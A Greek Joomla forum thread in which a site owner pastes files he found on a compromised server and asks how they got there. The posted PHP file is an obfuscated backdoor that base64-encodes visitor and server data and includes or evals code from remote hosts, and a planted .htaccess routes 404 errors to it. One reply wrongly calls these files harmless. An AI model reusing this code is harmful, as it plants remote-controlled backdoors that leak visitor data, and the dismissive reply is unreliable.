Αρχεία στο Σερβερ που δεν έπρεπε να βρίσκονται εκεί - Hacked

Moderators: Aris Ntatsis, geof

Locked
User avatar
nikolas
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 116
Joined: Mon Mar 27, 2006 6:44 pm
Location: Cyprus
Contact:

Αρχεία στο Σερβερ που δεν έπρεπε να βρίσκονται εκεί - Hacked

Post by nikolas » Sun Aug 24, 2008 3:09 pm

Τρέχω 30 Joomla sites και στα περισσότερα βρήκα μερικά αρχεία τα οποία δεν ανέβασα εγώ σε αρκετούς φακέλους

Το ένα είναι ενα .htaccess file

Code: Select all

Options -MultiViews
ErrorDocument 404 //administrator/components/com_joomlaxplorer/ftp_tmp/107004.php

Options -MultiViews
ErrorDocument 404 /administrator/components/com_joomlaxplorer/ftp_tmp/107004.php
Και το άλλος αριθμός.php π.χ. 107004.php

Code: Select all

<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode($i).".".base64_encode($j); if ((include(base64_decode("aHR0cDovLw==").base64_decode("YS5yc2RjcmFmdC53cw==")."/?".$str))); else if (include(base64_decode("aHR0cDovLw==").base64_decode("YWQucnVud2ViLmluZm8=")."/?".$str)); else eval(file_get_contents(base64_decode("aHR0cDovLzcueG1sZGF0YS5pbmZvLz8=").$str)); ?>
Υπάρχει και ένα error_log file στον ίδιο φάκελο

Code: Select all

[06-Feb-2008 16:12:46] PHP Warning:  Unknown(): Unable to load dynamic library '/usr/local/lib/php/extensions/no-debug-non-zts-20020429//etc/ixed/ixed.4.4.lin' - /usr/local/lib/php/extensions/no-debug-non-zts-20020429//etc/ixed/ixed.4.4.lin: cannot open shared object file: No such file or directory in Unknown on line 0
[06-Feb-2008 16:12:46] PHP Warning:  Unknown(): Unable to load dynamic library '/usr/local/lib/php/extensions/no-debug-non-zts-20020429//etc/ixed/ixed.4.4.lin' - /usr/local/lib/php/extensions/no-debug-non-zts-20020429//etc/ixed/ixed.4.4.lin: cannot open shared object file: No such file or directory in Unknown on line 0
[07-Feb-2008 06:07:49] PHP Warning:  Unknown(): Unable to load dynamic library '/usr/local/lib/php/extensions/no-debug-non-zts-20020429//etc/ixed/ixed.4.4.lin' - /usr/local/lib/php/extensions/no-debug-non-zts-20020429//etc/ixed/ixed.4.4.lin: cannot open shared object file: No such file or directory in Unknown on line 0
Πως ανέβασαν αυτά τα αρχεία; Πως μπορώ να διασφαλίσω την ασφάλεια των ιστοσελίδων μου; αν απλά διαγράψω αυτά τα αρχεία θα είναι εντάξη η ασφάλεια της ιστοσελίδας;
Thank You For your time

http://www.mplampla.com -The Ultimate Greek Fun Site
http://www.it4co.com - Web Design and development - Web hosting Solutions

User avatar
geof
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 108
Joined: Thu Nov 16, 2006 6:10 am
Contact:

Re: Αρχεία στο Σερβερ που δεν έπρεπε να βρίσκονται εκεί - Hacked

Post by geof » Mon Sep 01, 2008 7:51 am

Το .htaccess είναι κενό και προφανώς το ανέβασε κάποια εφαρμογή φιλικών URLs
Τα υπόλοιπα είναι δημιουργίες του server σου.
Joomla Support | Domain Name | Web Hosting in Greece | Website Eshop
.: easylogic https://easylogic.gr

User avatar
nikolas
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 116
Joined: Mon Mar 27, 2006 6:44 pm
Location: Cyprus
Contact:

Re: Αρχεία στο Σερβερ που δεν έπρεπε να βρίσκονται εκεί - Hacked

Post by nikolas » Mon Sep 01, 2008 8:13 am

To .httaccess file δεν ήταν κενό... απλά παραξενο μου φαίνετε και μόνο στις ιστοσελίδες που τρέχουν joomla ... στα άλλα websites στον ίδιο σέρβερ δεν έγινε το ίδιο
Thank You For your time

http://www.mplampla.com -The Ultimate Greek Fun Site
http://www.it4co.com - Web Design and development - Web hosting Solutions

User avatar
geof
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 108
Joined: Thu Nov 16, 2006 6:10 am
Contact:

Re: Αρχεία στο Σερβερ που δεν έπρεπε να βρίσκονται εκεί - Hacked

Post by geof » Tue Sep 02, 2008 5:21 am

Κάνε μια σύγκριση με το htaccess.txt και δημοσίευσε ή εξέτασε τις διαφορές που έχει για το τι ακριβώς κάνουν.
Joomla Support | Domain Name | Web Hosting in Greece | Website Eshop
.: easylogic https://easylogic.gr


Locked

Return to “Joomla! 1.0.x”